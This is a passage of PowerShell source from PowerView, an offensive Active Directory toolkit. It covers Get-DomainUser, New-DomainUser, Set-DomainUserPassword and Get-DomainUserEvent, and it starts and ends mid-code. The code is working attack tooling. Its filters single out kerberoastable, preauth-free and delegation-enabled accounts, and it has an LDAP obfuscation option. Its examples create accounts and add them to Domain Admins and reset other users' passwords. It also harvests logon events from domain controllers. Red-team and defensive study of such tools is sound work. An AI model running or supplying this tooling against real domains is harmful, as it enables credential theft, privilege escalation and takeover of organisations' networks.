fields.\n\nPowerView.User.Raw\n\nThe raw DirectoryServices.SearchResult object, if -Raw is enabled.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerView.User')]\n    [OutputType('PowerView.User.Raw')]\n    [CmdletBinding(DefaultParameterSetName = 'Enabled')]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')]\n        [String[]]\n        $Identity,\n\n        [Switch]\n        $SPN,\n\n        [Switch]\n        $AdminCount,\n\n        [Parameter(ParameterSetName = 'Enabled')]\n        [Switch]\n        $Enabled,\n\n        [Parameter(ParameterSetName = 'Disabled')]\n        [Switch]\n        $Disabled,\n\n        [Switch]\n        $Locked,\n\n        [Switch]\n        $Unlocked,\n\n        [Switch]\n        $PassExpired,\n\n        [Switch]\n        $PassNotExpired,\n\n        [Switch]\n        $AllowDelegation,\n\n        [Switch]\n        $DisallowDelegation,\n\n        [Switch]\n        $NoPassExpiry,\n\n        [Switch]\n        $Unconstrained,\n\n        [Switch]\n        $TrustedToAuth,\n\n        [Switch]\n        $RBCD,\n\n        [Alias('KerberosPreauthNotRequired', 'NoPreauth')]\n        [Switch]\n        $PreauthNotRequired,\n\n        [Switch]\n        $PassNotRequired,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $PassLastSet,\n\n        [Switch]\n        $Owner,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('Filter')]\n        [String]\n        $LDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $Properties,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ADSPath')]\n        [String]\n        $SearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]\n        [String]\n        $SecurityMasks,\n\n        [Switch]\n        $Tombstone,\n\n        [Alias('ReturnOne')]\n        [Switch]\n        $FindOne,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [Switch]\n        $Raw,\n\n        [Switch]\n        $SSL,\n\n        [Switch]\n        $Obfuscate\n    )\n\n    DynamicParam {\n        $UACValueNames = [Enum]::GetNames($UACEnum)\n        # add in the negations\n        $UACValueNames = $UACValueNames | ForEach-Object {$_; \"NOT_$_\"}\n        # create new dynamic parameter\n        New-DynamicParameter -Name UACFilter -ValidateSet $UACValueNames -Type ([array])\n    }\n\n    BEGIN {\n        $SearcherArguments = @{}\n        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }\n        if ($PSBoundParameters['Owner']) { $SearcherArguments['Properties'] = '*' }\n        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }\n        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }\n        if ($PSBoundParameters['Owner']) { $SearcherArguments['SecurityMasks'] = 'Owner' }\n        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n        if ($PSBoundParameters['SSL']) { $SearcherArguments['SSL'] = $SSL }\n        if ($PSBoundParameters['Obfuscate']) {$SearcherArguments['Obfuscate'] = $Obfuscate }\n\n        $PolicyArguments = @{}\n        if ($PSBoundParameters['Domain']) { $PolicyArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['Server']) { $PolicyArguments['Server'] = $Server }\n        if ($PSBoundParameters['ServerTimeLimit']) { $PolicyArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Credential']) { $PolicyArguments['Credential'] = $Credential }\n    }\n\n    PROCESS {\n        #bind dynamic parameter to a friendly variable\n        if ($PSBoundParameters -and ($PSBoundParameters.Count -ne 0)) {\n            New-DynamicParameter -CreateVariables -BoundParameters $PSBoundParameters\n        }\n\n        $IdentityFilter = ''\n        $Filter = ''\n        $MaximumAge = $Null\n        $Identity | Where-Object {$_} | ForEach-Object {\n            $IdentityInstance = $_.Replace('(', '\\28').Replace(')', '\\29')\n            if ($IdentityInstance -match '^S-1-') {\n                $IdentityFilter += \"(objectsid=$IdentityInstance)\"\n            }\n            elseif ($IdentityInstance -match '^CN=') {\n                $IdentityFilter += \"(distinguishedname=$IdentityInstance)\"\n                if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) {\n                    # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname\n                    #   and rebuild the domain searcher\n                    $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'\n                    Write-Verbose \"[Get-DomainUser] Extracted domain '$IdentityDomain' from '$IdentityInstance'\"\n                    $SearcherArguments['Domain'] = $IdentityDomain\n                }\n            }\n            elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') {\n                $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\\' + $_.ToString('X2') }) -join ''\n                $IdentityFilter += \"(objectguid=$GuidByteString)\"\n            }\n            elseif ($IdentityInstance.Contains('\\')) {\n                $ConvertedIdentityInstance = $IdentityInstance.Replace('\\28', '(').Replace('\\29', ')') | Convert-ADName -OutputType Canonical\n                if ($ConvertedIdentityInstance) {\n                    $UserDomain = $ConvertedIdentityInstance.SubString(0, $ConvertedIdentityInstance.IndexOf('/'))\n                    $UserName = $IdentityInstance.Split('\\')[1]\n                    $IdentityFilter += \"(samAccountName=$UserName)\"\n                    $SearcherArguments['Domain'] = $UserDomain\n                    Write-Verbose \"[Get-DomainUser] Extracted domain '$UserDomain' from '$IdentityInstance'\"\n                }\n            }\n            else {\n                $IdentityFilter += \"(samAccountName=$IdentityInstance)\"\n            }\n        }\n\n        if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {\n            $Filter += \"(|$IdentityFilter)\"\n        }\n\n        if ($PSBoundParameters['SPN']) {\n            Write-Verbose '[Get-DomainUser] Searching for non-null service principal names'\n            $Filter += '(servicePrincipalName=*)'\n        }\n        if ($PSBoundParameters['Enabled']) {\n            Write-Verbose '[Get-DomainUser] Searching for users who are enabled'\n            # negation of \"Accounts that are disabled\"\n            $Filter += '(!(userAccountControl:1.2.840.113556.1.4.803:=2))'\n        }\n        if ($PSBoundParameters['Disabled']) {\n            Write-Verbose '[Get-DomainUser] Searching for users who are disabled'\n            # inclusion of \"Accounts that are disabled\"\n            $Filter += '(userAccountControl:1.2.840.113556.1.4.803:=2)'\n        }\n        if ($PSBoundParameters['Locked']) {\n            Write-Verbose '[Get-DomainUser] Searching for users who are locked'\n            # need to get the lockout duration from the domain policy\n            $Duration = ((Get-DomainPolicy -Policy Domain @PolicyArguments).SystemAccess).LockoutDuration\n            if ($Duration -eq -1) {\n                $LockoutTime = 1\n            }\n            else {\n                $LockoutTime = (Get-Date).AddMinutes(-$Duration).ToFileTimeUtc()\n            }\n            $Filter += \"(lockoutTime>=$LockoutTime)\"\n        }\n        elseif ($PSBoundParameters['Unlocked']) {\n            Write-Verbose '[Get-DomainUser] Searching for users who are unlocked'\n            # need to get the lockout duration from the domain policy\n            $Duration = ((Get-DomainPolicy -Policy Domain @PolicyArguments).SystemAccess).LockoutDuration\n            if ($Duration -eq -1) {\n                $LockoutTime = 1\n            }\n            else {\n                $LockoutTime = (Get-Date).AddMinutes(-$Duration).ToFileTimeUtc()\n            }\n            $Filter += \"(!(lockoutTime>=$LockoutTime))\"\n        }\n        if ($PSBoundParameters['PassExpired']) {\n            Write-Verbose '[Get-DomainUser] Ignoring users that have passwords to never expire'\n            $Filter += '(!(userAccountControl:1.2.840.113556.1.4.803:=65536))'\n            Write-Verbose '[Get-DomainUser] Getting the maximum password age from the domain policy'\n            $MaximumAge = [Int]((Get-DomainPolicy -Policy Domain @PolicyArguments).SystemAccess).MaximumPasswordAge\n            if ($MaximumAge -lt 1) {\n                Write-Warning '[Get-DomainUser] Password expiry disabled in domain policy, no users will be returned'\n                return\n            }\n        }\n        elseif ($PSBoundParameters['NoPassExpiry']) {\n            Write-Verbose '[Get-DomainUser] Searching for users whose passwords never expire'\n            $Filter += '(userAccountControl:1.2.840.113556.1.4.803:=65536)'\n        }\n        if ($PSBoundParameters['PassNotExpired']) {\n            Write-Verbose \"[Get-DomainUser] Getting the maximum password age from the domain policy\"\n            $MaximumAge = [Int]((Get-DomainPolicy -Policy Domain @PolicyArguments).SystemAccess).MaximumPasswordAge\n        }\n        if ($PSBoundParameters['AllowDelegation']) {\n            Write-Verbose '[Get-DomainUser] Searching for users who can be delegated'\n            # negation of \"Accounts that are sensitive and not trusted for delegation\"\n            $Filter += '(!(userAccountControl:1.2.840.113556.1.4.803:=1048576))'\n        }\n        elseif ($PSBoundParameters['DisallowDelegation']) {\n            Write-Verbose '[Get-DomainUser] Searching for users who are sensitive and not trusted for delegation'\n            $Filter += '(userAccountControl:1.2.840.113556.1.4.803:=1048576)'\n        }\n        if ($PSBoundParameters['Unconstrained']) {\n            Write-Verbose '[Get-DomainUser] Searching for users configured for unconstrained delegation'\n            $Filter += '(userAccountControl:1.2.840.113556.1.4.803:=524288)'\n        }\n        if ($PSBoundParameters['AdminCount']) {\n            Write-Verbose '[Get-DomainUser] Searching for adminCount=1'\n            $Filter += '(admincount=1)'\n        }\n        if ($PSBoundParameters['TrustedToAuth']) {\n            Write-Verbose '[Get-DomainUser] Searching for users that are trusted to authenticate for other principals'\n            $Filter += '(msds-allowedtodelegateto=*)'\n        }\n        if ($PSBoundParameters['RBCD']) {\n            Write-Verbose '[Get-DomainUser] Searching for users that are configured to allow resource-based constrained delegation'\n            $Filter += '(msds-allowedtoactonbehalfofotheridentity=*)'\n        }\n        if ($PSBoundParameters['PreauthNotRequired']) {\n            Write-Verbose '[Get-DomainUser] Searching for user accounts that do not require kerberos preauthenticate'\n            $Filter += '(userAccountControl:1.2.840.113556.1.4.803:=4194304)'\n        }\n        if ($PSBoundParameters['PassNotRequired']) {\n            Write-Verbose '[Get-DomainUser] Searching for user accounts that have PASSWD_NOTREQD set'\n            $Filter += '(userAccountControl:1.2.840.113556.1.4.803:=32)'\n        }\n        if ($PSBoundParameters['PassLastSet']) {\n            Write-Verbose \"[Get-DomainUser] Searching for user accounts that have not had a password change for at least $PSBoundParameters['PassLastSet'] days\"\n            $PwdDate = (Get-Date).AddDays(-$PSBoundParameters['PassLastSet']).ToFileTime()\n            $Filter += \"(pwdlastset<=$PwdDate)\"\n        }\n\n        if ($PSBoundParameters['LDAPFilter']) {\n            Write-Verbose \"[Get-DomainUser] Using additional LDAP filter: $LDAPFilter\"\n            $Filter += \"$LDAPFilter\"\n        }\n\n        # build the LDAP filter for the dynamic UAC filter value\n        $UACFilter | Where-Object {$_} | ForEach-Object {\n            if ($_ -match 'NOT_.*') {\n                $UACField = $_.Substring(4)\n                $UACValue = [Int]($UACEnum::$UACField)\n                $Filter += \"(!(userAccountControl:1.2.840.113556.1.4.803:=$UACValue))\"\n            }\n            else {\n                $UACValue = [Int]($UACEnum::$_)\n                $Filter += \"(userAccountControl:1.2.840.113556.1.4.803:=$UACValue)\"\n            }\n        }\n\n        Write-Verbose \"[Get-DomainUser] filter string: (&(samAccountType=805306368)$Filter\"\n\n        $Results = Invoke-LDAPQuery @SearcherArguments -LDAPFilter \"(&(samAccountType=805306368)$Filter)\"\n\n        $Results | Where-Object {$_} | ForEach-Object {\n            if (Get-Member -inputobject $_ -name \"Attributes\" -Membertype Properties) {\n                $Prop = @{}\n                foreach ($a in $_.Attributes.Keys | Sort-Object) {\n                    if (($a -eq 'objectsid') -or ($a -eq 'sidhistory') -or ($a -eq 'objectguid') -or ($a -eq 'usercertificate') -or ($a -eq 'ntsecuritydescriptor') -or ($a -eq 'logonhours')) {\n                        $Prop[$a] = $_.Attributes[$a]\n                    }\n                    else {\n                        $Values = @()\n                        foreach ($v in $_.Attributes[$a].GetValues([byte[]])) {\n                            $Values += [System.Text.Encoding]::UTF8.GetString($v)\n                        }\n                        $Prop[$a] = $Values\n                    }\n                }\n            }\n            else {\n                $Prop = $_.Properties\n            }\n\n            $Continue = $True\n            if ($PSBoundParameters['PassExpired']) {\n                if ($MaximumAge -gt 0) {\n                    $PwdLastSet = $Prop.pwdlastset[0]\n                    if ($PwdLastSet -eq 0) {\n                        $PwdLastSet = $Prop.whencreated[0]\n                    }\n                    $ExpireTime = (Get-Date).AddDays(-$MaximumAge).ToFileTimeUtc()\n                    if ($PwdLastSet -gt $ExpireTime) {\n                        $Continue = $False\n                    }\n                }\n                else {\n                    $Continue = $False\n                }\n            }\n            elseif ($PSBoundParameters['PassNotExpired'] -and (($Prop.useraccountcontrol[0] -band 65536) -ne 65536)) {\n                if ($MaximumAge -gt 0) {\n                    $PwdLastSet = $Prop.pwdlastset[0]\n                    if ($PwdLastSet -eq 0) {\n                        $PwdLastSet = $Prop.whencreated[0]\n                    }\n                    $ExpireTime = (Get-Date).AddDays(-$MaximumAge).ToFileTimeUtc()\n                    if ($PwdLastSet -le $ExpireTime) {\n                        $Continue = $False\n                    }\n                }\n            }\n            if ($Continue) {\n                if ($PSBoundParameters['Raw']) {\n                    # return raw result objects\n                    $User = $_\n                    $User.PSObject.TypeNames.Insert(0, 'PowerView.User.Raw')\n                }\n                else {\n                    $User = Convert-LDAPProperty -Properties $Prop\n                    $User.PSObject.TypeNames.Insert(0, 'PowerView.User')\n                }\n                $User\n            }\n        }\n        if ($Results) {\n            try { $Results.dispose() }\n            catch { }\n        }\n    }\n}\n\n\nfunction New-DomainUser {\n<#\n.SYNOPSIS\n\nCreates a new domain user (assuming appropriate permissions) and returns the user object.\n\nTODO: implement all properties that New-ADUser implements (https://technet.microsoft.com/en-us/library/ee617253.aspx).\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-PrincipalContext  \n\n.DESCRIPTION\n\nFirst binds to the specified domain context using Get-PrincipalContext.\nThe bound domain context is then used to create a new\nDirectoryServices.AccountManagement.UserPrincipal with the specified user properties.\n\n.PARAMETER SamAccountName\n\nSpecifies the Security Account Manager (SAM) account name of the user to create.\nMaximum of 256 characters. Mandatory.\n\n.PARAMETER AccountPassword\n\nSpecifies the password for the created user. Mandatory.\n\n.PARAMETER Name\n\nSpecifies the name of the user to create. If not provided, defaults to SamAccountName.\n\n.PARAMETER DisplayName\n\nSpecifies the display name of the user to create. If not provided, defaults to SamAccountName.\n\n.PARAMETER Description\n\nSpecifies the description of the user to create.\n\n.PARAMETER Domain\n\nSpecifies the domain to use to search for user/group principals, defaults to the current domain.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.EXAMPLE\n\n$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\nNew-DomainUser -SamAccountName harmj0y2 -Description 'This is harmj0y' -AccountPassword $UserPassword\n\nCreates the 'harmj0y2' user with the specified description and password.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\n$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$user = New-DomainUser -SamAccountName harmj0y2 -Description 'This is harmj0y' -AccountPassword $UserPassword -Credential $Cred\n\nCreates the 'harmj0y2' user with the specified description and password, using the specified\nalternate credentials.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\n$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\nNew-DomainUser -SamAccountName andy -AccountPassword $UserPassword -Credential $Cred | Add-DomainGroupMember 'Domain Admins' -Credential $Cred\n\nCreates the 'andy' user with the specified description and password, using the specified\nalternate credentials, and adds the user to 'domain admins' using Add-DomainGroupMember\nand the alternate credentials.\n\n.OUTPUTS\n\nDirectoryServices.AccountManagement.UserPrincipal\n\n.LINK\n\nhttp://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('DirectoryServices.AccountManagement.UserPrincipal')]\n    Param(\n        [Parameter(Mandatory = $True)]\n        [ValidateLength(0, 256)]\n        [String]\n        $SamAccountName,\n\n        [Parameter(Mandatory = $True)]\n        [ValidateNotNullOrEmpty()]\n        [Alias('Password')]\n        [Security.SecureString]\n        $AccountPassword,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Name,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $DisplayName,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Description,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    $ContextArguments = @{\n        'Identity' = $SamAccountName\n    }\n    if ($PSBoundParameters['Domain']) { $ContextArguments['Domain'] = $Domain }\n    if ($PSBoundParameters['Credential']) { $ContextArguments['Credential'] = $Credential }\n    $Context = Get-PrincipalContext @ContextArguments\n\n    if ($Context) {\n        $User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList ($Context.Context)\n\n        # set all the appropriate user parameters\n        $User.SamAccountName = $Context.Identity\n        $TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword)\n        $User.SetPassword($TempCred.GetNetworkCredential().Password)\n        $User.Enabled = $True\n        $User.PasswordNotRequired = $False\n\n        if ($PSBoundParameters['Name']) {\n            $User.Name = $Name\n        }\n        else {\n            $User.Name = $Context.Identity\n        }\n        if ($PSBoundParameters['DisplayName']) {\n            $User.DisplayName = $DisplayName\n        }\n        else {\n            $User.DisplayName = $Context.Identity\n        }\n\n        if ($PSBoundParameters['Description']) {\n            $User.Description = $Description\n        }\n\n        Write-Verbose \"[New-DomainUser] Attempting to create user '$SamAccountName'\"\n        try {\n            $Null = $User.Save()\n            Write-Verbose \"[New-DomainUser] User '$SamAccountName' successfully created\"\n            $User\n        }\n        catch {\n            Write-Warning \"[New-DomainUser] Error creating user '$SamAccountName' : $_\"\n        }\n    }\n}\n\n\nfunction Set-DomainUserPassword {\n<#\n.SYNOPSIS\n\nSets the password for a given user identity.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-PrincipalContext  \n\n.DESCRIPTION\n\nFirst binds to the specified domain context using Get-PrincipalContext.\nThe bound domain context is then used to search for the specified user -Identity,\nwhich returns a DirectoryServices.AccountManagement.UserPrincipal object. The\nSetPassword() function is then invoked on the user, setting the password to -AccountPassword.\n\n.PARAMETER Identity\n\nA user SamAccountName (e.g. User1), DistinguishedName (e.g. CN=user1,CN=Users,DC=testlab,DC=local),\nSID (e.g. S-1-5-21-890171859-3433809279-3366196753-1113), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)\nspecifying the user to reset the password for.\n\n.PARAMETER AccountPassword\n\nSpecifies the password to reset the target user's to. Mandatory.\n\n.PARAMETER Domain\n\nSpecifies the domain to use to search for the user identity, defaults to the current domain.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.EXAMPLE\n\n$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\nSet-DomainUserPassword -Identity andy -AccountPassword $UserPassword\n\nResets the password for 'andy' to the password specified.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\n$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\nSet-DomainUserPassword -Identity andy -AccountPassword $UserPassword -Credential $Cred\n\nResets the password for 'andy' usering the alternate credentials specified.\n\n.OUTPUTS\n\nDirectoryServices.AccountManagement.UserPrincipal\n\n.LINK\n\nhttp://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('DirectoryServices.AccountManagement.UserPrincipal')]\n    Param(\n        [Parameter(Position = 0, Mandatory = $True)]\n        [Alias('UserName', 'UserIdentity', 'User')]\n        [String]\n        $Identity,\n\n        [Parameter(Mandatory = $True)]\n        [ValidateNotNullOrEmpty()]\n        [Alias('Password')]\n        [Security.SecureString]\n        $AccountPassword,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    $ContextArguments = @{ 'Identity' = $Identity }\n    if ($PSBoundParameters['Domain']) { $ContextArguments['Domain'] = $Domain }\n    if ($PSBoundParameters['Credential']) { $ContextArguments['Credential'] = $Credential }\n    $Context = Get-PrincipalContext @ContextArguments\n\n    if ($Context) {\n        $User = [System.DirectoryServices.AccountManagement.UserPrincipal]::FindByIdentity($Context.Context, $Identity)\n\n        if ($User) {\n            Write-Verbose \"[Set-DomainUserPassword] Attempting to set the password for user '$Identity'\"\n            try {\n                $TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword)\n                $User.SetPassword($TempCred.GetNetworkCredential().Password)\n\n                $Null = $User.Save()\n                Write-Verbose \"[Set-DomainUserPassword] Password for user '$Identity' successfully reset\"\n            }\n            catch {\n                Write-Warning \"[Set-DomainUserPassword] Error setting password for user '$Identity' : $_\"\n            }\n        }\n        else {\n            Write-Warning \"[Set-DomainUserPassword] Unable to find user '$Identity'\"\n        }\n    }\n}\n\n\nfunction Get-DomainUserEvent {\n<#\n.SYNOPSIS\n\nEnumerate account logon events (ID 4624) and Logon with explicit credential\nevents (ID 4648) from the specified host (default of the localhost).\n\nAuthor: Lee Christensen (@tifkin_), Justin Warner (@sixdub), Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \n\n.DESCRIPTION\n\nThis function uses an XML path filter passed to Get-WinEvent to retrieve\nsecurity events with IDs of 4624 (logon events) or 4648 (explicit credential\nlogon events) from -StartTime (default of now-1 day) to -EndTime (default of now).\nA maximum of -MaxEvents (default of 5000) are returned.\n\n.PARAMETER ComputerName\n\nSpecifies the computer name to retrieve events from, default of localhost.\n\n.PARAMETER StartTime\n\nThe [DateTime] object representing the start of when to collect events.\nDefault of [DateTime]::Now.AddDays(-1).\n\n.PARAMETER EndTime\n\nThe [DateTime] object representing the end of when to collect events.\nDefault of [DateTime]::Now.\n\n.PARAMETER MaxEvents\n\nThe maximum number of events to retrieve. Default of 5000.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target computer.\n\n.EXAMPLE\n\nGet-DomainUserEvent\n\nReturn logon events on the local machine.\n\n.EXAMPLE\n\nGet-DomainController | Get-DomainUserEvent -StartTime ([DateTime]::Now.AddDays(-3))\n\nReturn all logon events from the last 3 days from every domain controller in the current domain.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-DomainUserEvent -ComputerName PRIMARY.testlab.local -Credential $Cred -MaxEvents 1000\n\nReturn a max of 1000 logon events from the specified machine using the specified alternate credentials.\n\n.OUTPUTS\n\nPowerView.LogonEvent\n\nPowerView.ExplicitCredentialLogonEvent\n\n.LINK\n\nhttp://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerView.LogonEvent')]\n    [OutputType('PowerView.ExplicitCredentialLogonEvent')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('dnshostname', 'HostName', 'name')]\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $ComputerName = $Env:COMPUTERNAME,\n\n        [ValidateNotNullOrEmpty()]\n        [DateTime]\n        $StartTime = [DateTime]::Now.AddDays(-1),\n\n        [ValidateNotNullOrEmpty()]\n        [DateTime]\n        $EndTime = [DateTime]::Now,\n\n        [ValidateRange(1, 1000000)]\n        [Int]\n        $MaxEvents = 5000,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    BEGIN {\n        # the XML filter we're passing to Get-WinEvent\n        $XPathFilter = @\"\n<QueryList>\n    <Query Id=\"0\" Path=\"Security\">\n\n        <!-- Logon events -->\n        <Select Path=\"Security\">\n            *[\n                System[\n                    Provider[\n                        @Name='Microsoft-Windows-Security-Auditing'\n                    ]\n                    and (Level=4 or Level=0) and (EventID=4624)\n                    and TimeCreated[\n                        @SystemTime&gt;='$($StartTime.ToUniversalTime().ToString('s'))' and @SystemTime&lt;='$($EndTime.ToUniversalTime().ToString('s'))'\n                    ]\n                ]\n            ]\n            and\n            *[EventData[Data[@Name='TargetUserName'] != 'ANONYMOUS LOGON']]\n        </Select>\n\n        <!-- Logon with explicit credential events -->\n        <Select Path=\"Security\">\n            *[\n                System[\n                    Provider[\n                        @Name='Microsoft-Windows-Security-Auditing'\n                    ]\n                    and (Level=4 or Level=0) and (EventID=4648)\n                    and TimeCreated[\n                        @SystemTime&gt;='$($StartTime.ToUniversalTime().ToString('s'))' and @SystemTime&lt;='$($EndTime.ToUniversalTime().ToString('s'))'\n                    ]\n                ]\n            ]\n        </Select>\n\n        <Suppress Path=\"Security\">\n            *[\n                System[\n                    Provider[\n                        @Name='Microsoft-Windows-Security-Auditing'\n                    ]\n                    and\n                    (Level=4 or Level=0) and (EventID=4624 or EventID=4625 or EventID=4634)\n                ]\n            ]\n            and\n            *[\n                EventData[\n                    (\n                        (Data[@Name='LogonType']='5' or Data[@Name='LogonType']='0')\n                        or\n                        Data[@Name='TargetUserName']='ANONYMOUS LOGON'\n                        or\n                        Data[@Name='TargetUserSID']='S-1-5-18'\n                    )\n                ]\n            ]\n        </Suppress>\n    </Query>\n</QueryList>\n\"@\n        $EventArguments = @{\n            'FilterXPath' = $XPathFilter\n            'LogName' = 'Security'\n            'MaxEvents' = $MaxEvents\n        }\n        if ($PSBoundParameters['Credential']) { $EventArguments['Credential'] = $Credential }\n    }\n\n    PROCESS {\n        ForEach ($Computer in $ComputerName) {\n\n            $EventArguments['ComputerName'] = $Computer\n\n            Get-WinEvent @EventArguments| ForEach-Object {\n                $Event = $_\n                $Properties = $Event.Properties\n                Switch ($Event.Id) {\n                    # logon event\n                    4624 {\n                        # skip computer logons, for now...\n                        if(-not $Properties[5].Value.EndsWith('$')) {\n                            $Output = New-Object PSObject -Property @{\n                                ComputerName              = $Computer\n                                TimeCreated               = $Event.TimeCreated\n                                EventId                   = $Event.Id\n                                SubjectUserSid            = $Properties[0].Value.ToString()\n                                SubjectUserName           = $Properties[1].Value\n                                SubjectDomainName         = $Properties[2].Value\n                                SubjectLogonId            = $Properties[3].Value\n                                TargetUserSid             = $Properties[4].Value.ToString()\n                                TargetUserName            = $Properties[5].Value\n                                TargetDomainName          = $Properties[6].Value\n                                TargetLogonId             = $Properties[7].Value\n                                LogonType                 = $Properties[8].Value\n                                LogonProcessName          = $Properties[9].Value\n                                AuthenticationPackageName = $Properties[10].Value\n                                WorkstationName           = $Properties[11].Value\n                                LogonGuid                 = $Properties[12].Value\n                                TransmittedServices       = $Properties[13].Value\n                                LmPackageName             = $Properties[14].Value\n                                KeyLength                 = $Properties[15].Value\n                                ProcessId                 = $Properties[16].Value\n                                ProcessName               = $Properties[17].Value\n                                IpAddress                 = $Properties[18].Value\n                                IpPort                    = $Properties[19].Value\n                                ImpersonationLevel        = $Properties[20].Value\n                                RestrictedAdminMode       = $Properties[21].Value\n                                TargetOutboundUserName    = $Properties[22].Value\n                                TargetOutboundDomainName  = $Properties[23].Value\n                                VirtualAccount            = $Properties[24].Value\n                                TargetLinkedLogonId       = 